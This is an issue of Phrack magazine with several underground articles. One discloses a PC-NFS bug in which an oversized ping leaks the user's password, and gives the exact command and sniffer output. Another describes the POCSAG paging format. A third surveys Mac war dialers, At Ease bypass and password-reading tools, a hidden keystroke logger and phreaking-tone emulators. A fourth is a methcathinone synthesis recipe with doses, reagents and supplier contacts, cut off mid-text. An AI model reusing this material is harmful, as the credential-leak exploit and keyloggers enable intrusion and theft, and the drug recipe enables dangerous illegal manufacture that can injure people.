| ==Phrack Magazine== | |
| Volume Seven, Issue Forty-Eight, File 3 of 18 | |
| // // /\ // ==== | |
| // // //\\ // ==== | |
| ==== // // \\/ ==== | |
| /\ // // \\ // /=== ==== | |
| //\\ // // // // \=\ ==== | |
| // \\/ \\ // // ===/ ==== | |
| Part I | |
| ------------------------------------------------------------------------------ | |
| PC-NFS Bug | |
| I have found a nice little security hole in PC-NFS version 5.x. If you | |
| ping a PC-NFS user with a packet size of between 1450 to 1480, the | |
| PC's ICMP reply packet will divulge: | |
| o The hostname of the PC | |
| o The hostname of the PC's authentication server | |
| o The username of the person logged in | |
| o The password for the user (Thank you very much!) | |
| All of this information is in clear text unless PC-NFS's NETLOGIN is | |
| used. NETLOGIN uses XOR as its encryption, so this is hardly secure | |
| either. | |
| NDIS, ODI, 3C503 drivers on SMC and 3C503 cards have been tested | |
| and all freely return the above information on both PC-NFS versions | |
| 5.0 and 5.1a. This should work with other driver/NIC configurations | |
| also. | |
| You get the occasional added bonus of locking up the victims PC as | |
| well! | |
| This bug was new to Sun and they have created a new PCNFS.SYS | |
| driver for us. They have labeled it PC-NFS.SYS version 5.1a.DOD. | |
| This new version fills reply ICMP packets with nulls after 200 bytes of | |
| the requested pattern. | |
| Until you receive this patch from Sun, I would recommend setting all | |
| external router interface MTU to a value of no greater than 1350 as this | |
| is point where secrets are contained in the return packet. | |
| The Unix command to generate the below results is as follows: | |
| ping -s -c1 pchost.victim.com 1480 | |
| Use your favorite sniffer to filter ICMP packets and you have it. If you | |
| don't have a sniffer, try the -v(erbose) option of ping and convert the | |
| hex to ascii starting around byte 1382. | |
| Sniffer output follows: | |
| 19:03:48.81 | |
| ip: evil.com->pchost.victim.com | |
| icmp: echo request | |
| 62: 024 025 026 027 030 031 032 033 034 035 | |
| 72: 036 037 ! " # $ % & ' | |
| 82: ( ) * + , - . / 0 1 | |
| 92: 2 3 4 5 6 7 8 9 : ; | |
| 102: < = > ? @ A B C D E | |
| 112: F G H I J K L M N O | |
| 122: P Q R S T U V W X Y | |
| 132: Z [ \ ] ^ _ ` a b c | |
| 142: d e f g h i j k l m | |
| 152: n o p q r s t u v w | |
| 162: x y z { | } ~ 177 200 201 | |
| 172: 202 203 204 205 206 207 210 211 212 213 | |
| 182: 214 215 216 217 220 221 222 223 224 225 | |
| 192: 226 227 230 231 232 233 234 235 236 237 | |
| 202: 240 241 242 243 244 245 246 247 250 251 | |
| 212: 252 253 254 255 256 257 260 261 262 263 | |
| 222: 264 265 266 267 270 271 272 273 274 275 | |
| 232: 276 277 300 301 302 303 304 305 306 307 | |
| 242: 310 311 312 313 314 315 316 317 320 321 | |
| 252: 322 323 324 325 326 327 330 331 332 333 | |
| 262: 334 335 336 337 340 341 342 343 344 345 | |
| 272: 346 347 350 351 352 353 354 355 356 357 | |
| 282: 360 361 362 363 364 365 366 367 370 371 | |
| 292: 372 373 374 375 376 377 000 001 002 003 | |
| 302: 004 005 006 007 010 011 012 013 014 015 | |
| 312: 016 017 020 021 022 023 024 025 026 027 | |
| 322: 030 031 032 033 034 035 036 037 ! | |
| 332: " # $ % & ' ( ) * + | |
| 342: , - . / 0 1 2 3 4 5 | |
| 352: 6 7 8 9 : ; < = > ? | |
| 362: @ A B C D E F G H I | |
| 372: J K L M N O P Q R S | |
| 382: T U V W X Y Z [ \ ] | |
| 392: ^ _ ` a b c d e f g | |
| 402: h i j k l m n o p q | |
| 412: r s t u v w x y z { | |
| 422: | } ~ 177 200 201 202 203 204 205 | |
| 432: 206 207 210 211 212 213 214 215 216 217 | |
| 442: 220 221 222 223 224 225 226 227 230 231 | |
| 452: 232 233 234 235 236 237 240 241 242 243 | |
| 462: 244 245 246 247 250 251 252 253 254 255 | |
| 472: 256 257 260 261 262 263 264 265 266 267 | |
| 482: 270 271 272 273 274 275 276 277 300 301 | |
| 492: 302 303 304 305 306 307 310 311 312 313 | |
| 502: 314 315 316 317 320 321 322 323 324 325 | |
| 512: 326 327 330 331 332 333 334 335 336 337 | |
| 522: 340 341 342 343 344 345 346 347 350 351 | |
| 532: 352 353 354 355 356 357 360 361 362 363 | |
| 542: 364 365 366 367 370 371 372 373 374 375 | |
| 552: 376 377 000 001 002 003 004 005 006 007 | |
| 562: 010 011 012 013 014 015 016 017 020 021 | |
| 572: 022 023 024 025 026 027 030 031 032 033 | |
| 582: 034 035 036 037 ! " # $ % | |
| 592: & ' ( ) * + , - . / | |
| 602: 0 1 2 3 4 5 6 7 8 9 | |
| 612: : ; < = > ? @ A B C | |
| 622: D E F G H I J K L M | |
| 632: N O P Q R S T U V W | |
| 642: X Y Z [ \ ] ^ _ ` a | |
| 652: b c d e f g h i j k | |
| 662: l m n o p q r s t u | |
| 672: v w x y z { | } ~ 177 | |
| 682: 200 201 202 203 204 205 206 207 210 211 | |
| 692: 212 213 214 215 216 217 220 221 222 223 | |
| 702: 224 225 226 227 230 231 232 233 234 235 | |
| 712: 236 237 240 241 242 243 244 245 246 247 | |
| 722: 250 251 252 253 254 255 256 257 260 261 | |
| 732: 262 263 264 265 266 267 270 271 272 273 | |
| 742: 274 275 276 277 300 301 302 303 304 305 | |
| 752: 306 307 310 311 312 313 314 315 316 317 | |
| 762: 320 321 322 323 324 325 326 327 330 331 | |
| 772: 332 333 334 335 336 337 340 341 342 343 | |
| 782: 344 345 346 347 350 351 352 353 354 355 | |
| 792: 356 357 360 361 362 363 364 365 366 367 | |
| 802: 370 371 372 373 374 375 376 377 000 001 | |
| 812: 002 003 004 005 006 007 010 011 012 013 | |
| 822: 014 015 016 017 020 021 022 023 024 025 | |
| 832: 026 027 030 031 032 033 034 035 036 037 | |
| 842: ! " # $ % & ' ( ) | |
| 852: * + , - . / 0 1 2 3 | |
| 862: 4 5 6 7 8 9 : ; < = | |
| 872: > ? @ A B C D E F G | |
| 882: H I J K L M N O P Q | |
| 892: R S T U V W X Y Z [ | |
| 902: \ ] ^ _ ` a b c d e | |
| 912: f g h i j k l m n o | |
| 922: p q r s t u v w x y | |
| 932: z { | } ~ 177 200 201 202 203 | |
| 942: 204 205 206 207 210 211 212 213 214 215 | |
| 952: 216 217 220 221 222 223 224 225 226 227 | |
| 962: 230 231 232 233 234 235 236 237 240 241 | |
| 972: 242 243 244 245 246 247 250 251 252 253 | |
| 982: 254 255 256 257 260 261 262 263 264 265 | |
| 992: 266 267 270 271 272 273 274 275 276 277 | |
| 1002: 300 301 302 303 304 305 306 307 310 311 | |
| 1012: 312 313 314 315 316 317 320 321 322 323 | |
| 1022: 324 325 326 327 330 331 332 333 334 335 | |
| 1032: 336 337 340 341 342 343 344 345 346 347 | |
| 1042: 350 351 352 353 354 355 356 357 360 361 | |
| 1052: 362 363 364 365 366 367 370 371 372 373 | |
| 1062: 374 375 376 377 000 001 002 003 004 005 | |
| 1072: 006 007 010 011 012 013 014 015 016 017 | |
| 1082: 020 021 022 023 024 025 026 027 030 031 | |
| 1092: 032 033 034 035 036 037 ! " # | |
| 1102: $ % & ' ( ) * + , - | |
| 1112: . / 0 1 2 3 4 5 6 7 | |
| 1122: 8 9 : ; < = > ? @ A | |
| 1132: B C D E F G H I J K | |
| 1142: L M N O P Q R S T U | |
| 1152: V W X Y Z [ \ ] ^ _ | |
| 1162: ` a b c d e f g h i | |
| 1172: j k l m n o p q r s | |
| 1182: t u v w x y z { | } | |
| 1192: ~ 177 200 201 202 203 204 205 206 207 | |
| 1202: 210 211 212 213 214 215 216 217 220 221 | |
| 1212: 222 223 224 225 226 227 230 231 232 233 | |
| 1222: 234 235 236 237 240 241 242 243 244 245 | |
| 1232: 246 247 250 251 252 253 254 255 256 257 | |
| 1242: 260 261 262 263 264 265 266 267 270 271 | |
| 1252: 272 273 274 275 276 277 300 301 302 303 | |
| 1262: 304 305 306 307 310 311 312 313 314 315 | |
| 1272: 316 317 320 321 322 323 324 325 326 327 | |
| 1282: 330 331 332 333 334 335 336 337 340 341 | |
| 1292: 342 343 344 345 346 347 350 351 352 353 | |
| 1302: 354 355 356 357 360 361 362 363 364 365 | |
| 1312: 366 367 370 371 372 373 374 375 376 377 | |
| 1322: 000 001 002 003 004 005 006 007 010 011 | |
| 1332: 012 013 014 015 016 017 020 021 022 023 | |
| 1342: 024 025 026 027 030 031 032 033 034 035 | |
| 1352: 036 037 ! " # $ % & ' | |
| 1362: ( ) * + , - . / 0 1 | |
| 1372: 2 3 4 5 6 7 8 9 : ; | |
| 1382: < = > ? @ A B C D E | |
| 1392: F G H I J K L M N O | |
| 1402: P Q R S T U V W X Y | |
| 1412: Z [ \ ] ^ _ ` a b c | |
| 1422: d e f g h i j k l m | |
| 1432: n o p q r s t u v w | |
| 1442: x y z { | } ~ 177 200 201 | |
| 1452: 202 203 204 205 206 207 210 211 212 213 | |
| 1462: 214 215 216 217 220 221 222 223 224 225 | |
| 1472: 226 227 230 231 232 233 234 235 236 237 | |
| 1482: 240 241 242 243 244 245 246 247 250 251 | |
| 19:03:48.85 | |
| ip: pchost.victim.com->evil | |
| icmp: echo reply | |
| 62: 024 025 026 027 030 031 032 033 034 035 | |
| 72: 036 037 ! " # $ % & ' | |
| 82: ( ) * + , - . / 0 1 | |
| 92: 2 3 4 5 6 7 8 9 : ; | |
| 102: < = > ? @ A B C D E | |
| 112: F G H I J K L M N O | |
| 122: P Q R S T U V W X Y | |
| 132: Z [ \ ] ^ _ ` a b c | |
| 142: d e f g h i j k l m | |
| 152: n o p q r s t u v w | |
| 162: x y z { | } ~ 177 200 201 | |
| 172: 202 203 204 205 206 207 210 211 212 213 | |
| 182: 214 215 216 217 220 221 222 223 224 225 | |
| 192: 226 227 230 231 232 233 234 235 236 237 | |
| 202: 240 241 242 243 244 245 246 247 250 251 | |
| 212: 252 253 254 255 256 257 260 261 262 263 | |
| 222: 264 265 266 267 270 271 272 273 274 275 | |
| 232: 276 277 300 301 302 303 304 305 306 307 | |
| 242: 310 311 312 313 314 315 316 317 320 321 | |
| 252: 322 323 324 325 000 000 324 005 ^ $ | |
| 262: : 004 000 000 000 000 000 000 000 000 | |
| 272: 036 006 W V P S Q R 016 007 | |
| 282: 277 ^ $ 213 367 350 X p r c | |
| 292: 212 E " < 000 u 005 350 V 003 | |
| 302: 353 W < 005 u 005 350 W 002 353 | |
| 312: N < 010 u 007 306 006 325 # 001 | |
| 322: 353 H < 015 u 007 306 006 325 # | |
| 332: 001 353 = < 017 u 007 306 006 325 | |
| 342: # 001 353 2 < 022 u 005 350 021 | |
| 352: 002 353 $ < 003 u 005 350 9 003 | |
| 362: 353 033 < 022 w 017 2 344 213 360 | |
| 372: 212 204 300 # P 350 225 305 X 353 | |
| 382: 010 P 270 c 000 350 213 305 X 306 | |
| 392: 006 205 347 000 Z Y [ X ^ _ | |
| 402: 007 037 313 P S Q R U 036 006 | |
| 412: W V 214 310 216 330 216 300 306 006 | |
| 422: 325 # 000 373 277 ^ $ 273 A 347 | |
| 432: 271 006 000 215 6 d $ 212 004 210 | |
| 442: 005 212 007 210 004 F G C 342 363 | |
| 452: 241 x $ 243 | $ 241 z $ 243 | |
| 462: ~ $ 241 324 ) 243 x $ 241 326 | |
| 472: ) 243 z $ 277 ^ $ 212 E " | |
| 482: < 010 u 015 P 270 ` 000 350 $ | |
| 492: 305 X 350 275 001 353 022 < 015 u | |
| 502: 012 P 270 a 000 350 023 305 X 353 | |
| 512: 004 < 017 u 003 350 017 000 306 006 | |
| 522: 205 347 000 ^ _ 007 037 ] Z Y | |
| 532: [ X 303 P 270 < 000 350 363 304 | |
| 542: X 307 E $ 000 000 215 u " 213 | |
| 552: M 020 206 351 203 351 024 367 301 001 | |
| 562: 000 t 006 213 331 306 000 000 A 321 | |
| 572: 371 350 , o 211 ] $ 307 E 030 | |
| 582: 000 000 215 u 016 271 012 000 350 033 | |
| 592: o 211 ] 030 213 E 020 206 340 005 | |
| 602: 016 000 243 ` % 211 > b % 214 | |
| 612: 016 d % 277 ^ % . 376 006 ? | |
| 622: 020 350 9 276 . 376 016 ? 020 303 | |
| 632: & 213 E 002 013 300 t 020 243 326 | |
| 642: # & 213 ] 004 211 036 330 # 350 | |
| 652: 231 m 353 0 200 > 324 ) 000 t | |
| 662: 033 & 203 } 006 000 t 024 203 > | |
| 672: 326 # 000 u 015 350 031 000 203 > | |
| 682: 326 # 000 t 003 350 u m 241 326 | |
| 692: # & 211 E 002 241 330 # & 211 | |
| 702: E 004 303 & 213 M 006 006 V W | |
| 712: 016 007 272 000 000 277 334 # 350 $ | |
| 722: 000 241 323 # 243 350 X 203 > 326 | |
| 732: # 000 u 023 366 006 343 015 001 u | |
| 742: 014 203 > 350 X 000 u 353 272 001 | |
| 752: 000 342 332 _ ^ 007 303 Q R W | |
| 762: 203 372 000 u 021 203 > 030 214 000 | |
| 772: t 012 276 004 214 271 003 000 363 245 | |
| 782: 353 010 270 377 377 271 003 000 363 253 | |
| 792: 276 A 347 271 003 000 363 245 _ 270 | |
| 802: 377 377 211 E 036 211 E 241 324 | |
| 812: ) 211 E 032 241 326 ) 211 E 034 | |
| 822: 270 000 206 340 211 E 020 306 E | |
| 832: 016 E 306 E 017 000 307 E 022 000 | |
| 842: 000 307 E 024 000 000 306 E 026 002 | |
| 852: 306 E 027 001 307 E 014 010 000 3 | |
| 862: 300 306 E " 021 210 E # 211 E | |
| 872: & 211 E ( 350 250 376 Z Y 303 | |
| 882: 200 > 326 # 000 u 014 213 E * | |
| 892: 243 326 # 213 E , 243 330 # P | |
| 902: 270 V 000 350 205 303 X 303 P S | |
| 912: Q R 213 E : 213 ] < 213 M | |
| 922: & 213 U ( 350 223 k Z Y [ | |
| 932: X P 270 \ 000 350 e 303 X 303 | |
| 942: 306 E " 000 P 270 X 000 350 X | |
| 952: 303 X 303 & 213 E 002 & 213 ] | |
| 962: 004 & 213 U 006 006 W 016 007 350 | |
| 972: Y i s 003 351 227 000 277 334 # | |
| 982: W 271 003 000 363 245 276 A 347 271 | |
| 992: 003 000 363 245 _ 211 E 036 211 ] | |
| 1002: 241 324 ) 211 E 032 241 326 ) | |
| 1012: 211 E 034 270 000 206 340 211 E | |
| 1022: 020 306 E 016 E 306 E 017 000 307 | |
| 1032: E 022 000 000 307 E 024 000 000 306 | |
| 1042: E 026 377 306 E 027 001 307 E 014 | |
| 1052: 010 000 3 300 306 E " 010 210 E | |
| 1062: # 211 E & 377 006 h % 241 h | |
| 1072: % 211 E ( 211 026 350 X 211 026 | |
| 1082: l % 307 006 j % 000 000 350 322 | |
| 1092: 375 203 > 350 X 000 t # 366 006 | |
| 1102: 343 015 001 u ! 203 > j % 000 | |
| 1112: t 353 203 > j % 001 u 011 241 | |
| 1122: l % + 006 350 X 353 015 270 375 | |
| 1132: 377 353 010 270 376 377 353 003 270 377 | |
| 1142: 377 307 006 l % 000 000 _ 007 & | |
| 1152: 211 E 010 303 P 270 ^ 000 350 206 | |
| 1162: 302 X 203 > l % 000 t 017 213 | |
| 1172: ] ( ; 036 h % u 006 307 006 | |
| 1182: j % 001 000 303 P 270 ; 000 350 | |
| 1192: g 302 X 203 > l % 000 t 006 | |
| 1202: 307 006 j % 002 000 303 000 000 000 | |
| 1212: 000 000 000 000 000 000 000 000 000 000 | |
| 1222: 000 000 000 000 000 000 000 000 000 000 | |
| 1232: 000 000 000 000 000 000 000 000 000 000 | |
| 1242: 000 000 000 000 000 000 000 000 002 000 | |
| 1252: 000 000 300 A 000 000 034 000 000 000 | |
| 1262: 200 000 000 000 k 000 000 000 000 016 | |
| 1272: 000 000 000 000 000 000 000 000 000 | |
| 1282: 010 000 000 000 252 001 000 000 010 5 | |
| 1292: 000 000 r 027 301 . 000 000 000 000 | |
| 1302: 036 F 300 . 000 000 000 000 036 F | |
| 1312: 300 . 000 000 000 000 000 000 000 000 | |
| 1322: 000 000 000 000 000 000 000 000 000 000 | |
| 1332: 000 000 000 000 000 000 000 000 000 000 | |
| 1342: 000 000 000 000 000 000 000 000 000 | |
| 1352: 000 000 000 002 000 000 200 366 = 000 | |
| 1362: { 255 023 000 242 265 015 000 002 000 | |
| 1372: 000 000 S 017 005 000 C 003 000 000 | |
| 1382: p c h o s t 000 000 000 000 | |
| 1392: 000 000 000 000 000 000 244 A @ - | |
| 1402: s e r v e r 1 000 000 000 | |
| 1412: 000 000 000 000 000 000 244 A @ 001 | |
| 1422: 000 000 000 000 000 000 000 000 000 000 | |
| 1432: 000 000 000 000 000 000 244 A @ 001 | |
| 1442: u s e r n a m e 000 000 | |
| 1452: p a s s w d 000 000 000 000 | |
| 1462: 000 000 000 000 000 000 000 000 000 000 | |
| 1472: 000 000 000 000 000 000 000 000 000 000 | |
| 1482: 000 000 200 000 k 000 260 271 377 377 | |
| 1492: 344 275 9 212 | |
| The names have been changed to protect the innocent, but the rest is actual. | |
| Byte 1382: PC's hostname | |
| Byte 1402: PC's Authentication server hostname | |
| Byte 1382: The user's account name. Shows nobody if logged out. | |
| Byte 1382: The user's password. | |
| ------------------------------------------------------------------------------ | |
| POCSAG paging format, code and code capacity | |
| The POCSAG (Post Office Code Standardization Advisory Group) code is a | |
| synchronous paging format that allows pages to be transmitted in a SINGLE-BATCH | |
| structure. The POCSAG codes provides improved battery-saving capability and an | |
| increased code capacity. | |
| The POCSAG code format consists of a preamble and one or more batches of | |
| codewords. Each batch comprises a 32-bit frame synchronization code and eight | |
| 64-bit address frames of two 32-bit addresses or idle codewords each. The | |
| frame synchronization code marks the start of the batch of codewords. | |
| -PREAMBLE STRUCTURE | |
| The preamble consists of 576 bits of an alternating 101010 pattern transmitted | |
| at a bit rate of 512 or 1200 bps. The decoder uses the preamble both to | |
| determine if the data received is a POCSAG signal and for synchronization with | |
| the stream of data. | |
| |---Preamble----|-----------First Batch-------------|--Subsec. Batch--| | |
| ______________________________________________________< <____________ | |
| paging | 576 bits of | | | | | | | | | | | > > | | |
| format | reversals |F| | | | | | | | | | | | | | | | |F| | | |
| | (101010, etc) |S| | | | | | | | | | | | | | | | |S| | | |
| |_______________|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|__< <____________| | |
| > > | |
| 1 FRAME = 2 CODEWORDS | |
| Preamble Batchs | |
| 512 BPS 1125 mS 1062.5 mS | |
| 1200 BPS 480 mS 453.3 mS | |
| CodeWords Structure | |
| ____________________________________________________________________ | |
| BIT | | | | | | | |
| NUMBER | 1 | 2 to 19 | 20,21 | 22 to 31 | 32 | | |
| |___|______________|_______|_______________________|_________________| | |
| ____________________________________________________________________ | |
| ADDRESS| | | | | | | |
| FORMAT | 0 | Address Bits | S I B | Parity Check Bits | Even parity | | |
| |___|______________|_______|_______________________|_________________| | |
| ^ | |
| Source identifier bits | |
| ____________________________________________________________________ | |
| MESSAGE| | | | | | |
| FORMAT | 1 | Message Bits | Parity Check Bits | Even parity | | |
| |___|______________________|_______________________|_________________| | |
| -BATCH STRUCTURE | |
| A batch consist of frame synchronization code follow by 8 frames of two address | |
| codewords per frame (16 address codewords per batch). In order to maintain the | |
| proper batch structure, each frame is filled with two address codewords, or two | |
| idle codewords, or two message codewords, or any appropriate combination of the | |
| three codewords types. | |
| -FRAME SYNCHRONIZATION CODE STRUCTURE | |
| The frame synchronization (FS) code is a unique, reserved word that is used to | |
| identify the beginning of each batch. The FS code comprises the 32 bits: | |
| 011111100110100100001010111011000. | |
| -OPTIONAL ALTERNATE FRAME SYNCHRONIZATION CODEWORDS | |
| An alternate frame synchronization (AFS) code can be selected to support special | |
| systems or systems that require increased coding capability. The AFS is | |
| generated in the same manner as an address codeword (i.e., BCH codeword with | |
| parity bits). The POCSAG signaling standard has reserved special codewords for | |
| the AFS from 2,000,000 to 2,097,151. The use of the AFS requires the paging | |
| system to support the AFS. The AFS will change to frame 0 on the programmer | |
| since no frame information is included in the AFS. The AFS should use address | |
| 1 so that bit 20 and 21 are 0. | |
| -ADDRESS CODEWORD STRUCTURE | |
| An address codeword's first bit (bit 1) is always a zero. Bits 2 through 19 are | |
| the address bits. The pagers looks at these bits to find its own unique | |
| address. Each POCSAG codeword is capable of providing address information for | |
| four different paging sources (Address 1 to 4). These address are determined | |
| by combinations of values of bits 20 and 21 ( the source-identifier bits). Bits | |
| 22 through 31 are the parity check bits, and bit 32 is the even parity bit. | |
| BIT 20 BIT 21 | |
| Address 1 0 0 | |
| Address 2 0 1 | |
| Address 3 1 0 | |
| Address 4 1 1 | |
| Pre-coded into the code plug are three bits which designate the frame location, | |
| within each batch, at which the pager's address is to be received; the decoder | |
| will look at the codewords in this frame for its address. | |
| Power is removed from the receiver during all frames other than the precoded | |
| one, thus extending pager battery life. | |
| -CODE CAPACITY | |
| The combination of the code plug's three pre-coded frame location bits and address codeword's 18 address bits provides over two million different assignable codes. In this combination, the frame location bits are the least-significant bits, and the addres | |
| s | |
| bits are the most-significant bits. | |
| -MESSAGE CODEWORD STRUCTURE | |
| A message codeword structure always start with a 1 in bit 1 and always follows | |
| directly after the address. Each message codeword replaces an address codeword | |
| in the batch. | |
| -IDLE CODEWORD STRUCTURE | |
| The idle codeword is unique, reserved codeword used to talk place of an address | |
| in any frame that would not otherwise be filled with 64 bits. | |
| Thus, if a frame contains only an address, an idle codeword comprises the 32 | |
| bits: | |
| 01111010100010011100000110010111 | |
| -POCSAG CHARACTERS | |
| CHAR HEX | CHAR HEX | CHAR HEX | | |
| | | | | |
| # 23 | $ 24 | @ 40 | | |
| [ 5B | \ 5C | ] 5D | | |
| ^ 5E | _ 5F | ' 60 | | |
| { 7B | | 7C | } 7D | | |
| ~ 7E | DEL 7F | SP 20 | | |
| ------------------------------------------------------------------------------ | |
| MACINTOSH HACKING | |
| by Logik Bomb | |
| "My fellow astronauts..." | |
| -Dan Quayle | |
| Now, two people have mailed Erik Bloodaxe asking about Macintosh | |
| hacking particularly war dialers, and each time he insulted Macs and tried | |
| to get someone to write a file on it. No one has done it. So I guess I have | |
| to. | |
| First, some words on Macintoshes. Steve Jobs and Steve Wozniak, the | |
| originators of the Apple and the Macintosh were busted for phreaking in | |
| college. The Apple IIe was used almost universally by hackers. So why has | |
| the Mac fallen out of favor for hacking? Simple. Because it fell out of | |
| favor for everything else. Apple screwed up and wouldn't let clone makers | |
| license the MacOS. As a result, 80% of personal computers run DOS, and | |
| Macintoshes are left in the minority. Second, DOS compatible users, and | |
| hackers in particular, have an image of Mac users as a bunch of whiny | |
| lamers who paid too much for a computer and as a result are constantly | |
| defensive. The solution to this impression is to not be an asshole. I know | |
| it drives every Mac user crazy when he reads some article about Windows | |
| 95's brand new, advanced features such as "plug-and-play" that the | |
| Macintosh has had since 1984. But just try and take it. If it's any | |
| consolation, a lot of IBM-compatible (a huge misnomer, by the way) users | |
| hate Windows too. | |
| Now, on with the software. | |
| ------------------------- | |
| Assault Dialer 1.5 | |
| Assault Dialer, by Crush Commando, is the premier Mac war dialer, | |
| the Mac's answer to ToneLoc. It has an ugly interface, but it's the best we | |
| have right now. It is the successor to a previous war dialer known as Holy | |
| War Dialer 2.0. The only real competitor I've heard of for Assault Dialer | |
| is Tyrxis Shockwave 2.0, but the only version I could get a hold of was | |
| 1.0, and it wasn't as good as Assault Dialer, so that's your best bet right | |
| now. | |
| MacPGP 2.6.2 and PGPfone 1.0b4 | |
| MacPGP is the Macintosh port of the infamous PGP (Pretty Good | |
| Privacy.) This file is not about cryptography, so if you want to know about | |
| PGP read the fuckin' read me and docs that come with the file. Strangely | |
| enough, however, Phil Zimmerman released PGPfone, a utility for encrypting | |
| your phone and making it a secure line, for the Mac _first._ I don't know | |
| why, and I haven't had a chance to test it, but the idea's pretty cool. If | |
| PGP doesn't get Zimmerman thrown in jail, this will. | |
| DisEase 1.0 and DisEase 3.0 | |
| Schools and concerned parents have always had a problem. Schools | |
| can't have students deleting the hard drive, and parents don't want their | |
| kids looking at the kinky pictures they downloaded. So Apple came out with | |
| At Ease, an operating system that runs over System 7, sort of the same way | |
| Windows runs off of DOS. However, I can't stand At Ease. Everything about | |
| it, from the Fisher-Price screen to the interface drives me crazy. It | |
| drives a lot of other people crazy too. So it was just a matter of time | |
| before someone made a program to override it. The first was DisEase 1.0, a | |
| small program by someone calling himself Omletman, that would override At | |
| Ease if you put in a floppy loaded with it and clicked six times. Omletman | |
| improved this design and eventually released 3.0. (I haven't been able to | |
| find any evidence that a 2.0 was ever released) 3.0 has such cool features | |
| as reading the preferences file to give you the password, so you can change | |
| the obnoxious greeting teachers always put to something more sinister. The | |
| only problem with 3.0 is that some configurations of At Ease only let | |
| documents be read off of disks; no applications, which means DisEase 3.0 | |
| won't appear, and so you can't run it. However, with 1.0 you don't have to | |
| actually open the application, you just click six times, so if you use 1.0 | |
| to get to the finder, and then 3.0 to read the passwords, things will work. | |
| Invisible Oasis Installer | |
| Oasis is a keystroke recorder, so you can find out passwords. | |
| However, with the original Oasis, you had to put it in the Extensions | |
| folder and make it invisible with ResEdit, which takes a while. Invisible | |
| Oasis Installer, however, installs it where it should be and automatically | |
| makes it invisible. | |
| "So everything's wrapped up in a nice neat little _package_, then?" | |
| -Homer Simpson | |
| Anonymity 2.0 and Repersonalize 1.0 | |
| Anonymity, version 1.2, was a rather old program whose author has | |
| long been forgotten that was the best data fork alterer available. It | |
| removed the personalization to programs. However, in around 1990 someone | |
| named the Doctor made 2.0, a version with some improvements. Repersonalize | |
| was made in 1988 (God, Mac hacking programs are old) which reset | |
| personalization on some of the Microsoft and Claris programs, so you could | |
| enter a different personalization name. I don't know if it will still work | |
| on Microsoft Word 6.0.1 and versions of programs released recently, but I | |
| don't really care because I use Word 5.1a and I'm probably not going to | |
| upgrade for a while. | |
| Phoney (AKA Phoney4Mac) | |
| Phoney is an excellent program that emulates the Blue Box, Red Box, | |
| Black Box and Green Box tones. There is also Phoney4Newton, which does the | |
| same thing on the most portable of computers, the Newton. | |
| That's all I'm covering in this file as far as Mac hacking | |
| programs. You'll probably want to know where to find all this crap, so here | |
| are all of the Mac hacking ftp and Web sites I know of: | |
| Space Rogue's Whacked Mac Archives (http://l0pht.com/~spacerog/index.html) | |
| This site, run by Space Rogue is L0pht Heavy Industries' Mac site. | |
| It is probably the largest and best archive of Mac hacking software | |
| connected to the Internet. The problem with this is that it can't handle | |
| more than two anonymous users, meaning that unless you pay to be part of | |
| L0pht, you will never get into this archive. I've tried getting up at 4:30 | |
| AM, thinking that no one in their right mind would possibly be awake at | |
| this time, but there is always, somehow, somewhere, two people in Iceland | |
| or Singapore or somewhere on this site. | |
| The Mac Hacking Home Page (http://www.aloha.com/~seanw/index.html) | |
| This site does not look like much, and it is fairly obvious that | |
| its maintainer, Sean Warren, is still learning HTML, but it is reliable and | |
| is a good archive. It is still growing, probably due to the fact that it is | |
| one of the only Internet Mac hacking sites anyone can get to and upload. | |
| Kn0wledge Phreak <k0p> (http://www.uccs.edu/~abusby/k0p.html) | |
| This is an excellent site and has many good programs. There is one | |
| catch, however. It's maintainer, Ole Buzzard, is actually getting the files | |
| from his BBS. So many of the really good files are locked away in the k0p | |
| BBS, and those of us who can't pay long distance can't get the files. Oh | |
| well. | |
| Bone's H/P/C Page o' rama- part of the Cyber Rights Now! home page | |
| (http://www.lib.iup.edu/~seaman/index.html) | |
| While this is hardly a Macintosh hacking site, it's just a hacking | |
| site, it does have very few Mac files, some of which are hard to get to. | |
| However, Bone might get expelled because of a long story involving AOHell, | |
| so this page might not be here. Then again, maybe Bone won't get expelled | |
| and this site will stay. Never can tell 'bout the future, can you? | |
| "We predict the future. We invent it." | |
| -Nasty government guy on the season premiere of _The X-Files_ | |
| Andy Ryder | |
| Netsurfer and Road Warrior on the Info Highway | |
| I've pestered Bruce Sterling _and_ R.U. Sirius! | |
| As mentioned in the alt.devilbunnies FAQ, part I (Look it up!) | |
| Once scored 29,013,920 points on Missile Command | |
| "This Snow Crash thing- is it a virus, a drug, or a religion?" | |
| -Hiro Protagonist | |
| "What's the difference?" | |
| -Juanita Marquez | |
| "...one person's 'cyberpunk' is another's everyday obnoxious teenager with | |
| some technical skill thrown in..." | |
| -Erich Schneider, "alt.cyberpunk Frequently Asked Questions List" | |
| "More than _some_ technical skill." | |
| -Andy Ryder | |
| ------------------------------------------------------------------------------ | |
| Making Methcathinone | |
| Compiled | |
| by Anonymous | |
| Ok, this has got to be the easiest drug made at home (by far). This is very | |
| similar to methamphetamine in structure, effect, and use. Typical doses | |
| start at 20mg up to 60mg. Start low, go slow. Cat can be taken orally (add | |
| 10 mg) or through mucous membranes (nasally). | |
| Ingredients: | |
| Diet pills, or bronchodilator pills (1000 ea) containing 25mg ephedrine. | |
| Potassium chromate, or dichromate (easily gotten from chem lab. orange/red) | |
| Conc. Sulfuric acid - it's up to you where you get this. Contact me if you | |
| need help locating it. | |
| Hydrochloric acid or Muriatic acid - Pool supply stores, hardware stores, it | |
| is used for cleaning concrete. | |
| Sodium Hydroxide - Hardware stores. AKA lye. | |
| Toluene - Hardware store, paint store. | |
| Lab equipment: | |
| 1 liter, 3 neck flask - get it from school or Edmund's Scientific ($20.00) | |
| 125 mL separatory funnel - same as above | |
| glass tubing - same as above | |
| Buchner funnel - This is a hard to find item, but must schools have at least | |
| one. They are usually white porcelain or plastic. They look | |
| like a funnel with a flat disk in the bottom with lots of | |
| holes in it. If you need one, arrangements can be made. | |
| Aspirator or vacuum pump - Any lab-ware supply catalog, about $10.00 | |
| References to Edmund's Scientific Co, in NJ, are accurate. You have to go | |
| to their "Lab Surplus/Mad Scientist" room. The prices are incredible. | |
| This place is definitely a recommended stopping sight for anybody going | |
| through New Jersey. It is located in "Barrington", about 30 minutes from | |
| center city Philadelphia. | |
| All of the above can be purchased from "The Al-Chymist". Their number is | |
| (619)948-4150. Their address is: 17525 Alder #49 | |
| Hesperia, Ca 92345 | |
| Call and ask for a catalog. | |
| That's it. The body of this article is stolen from the third edition of | |
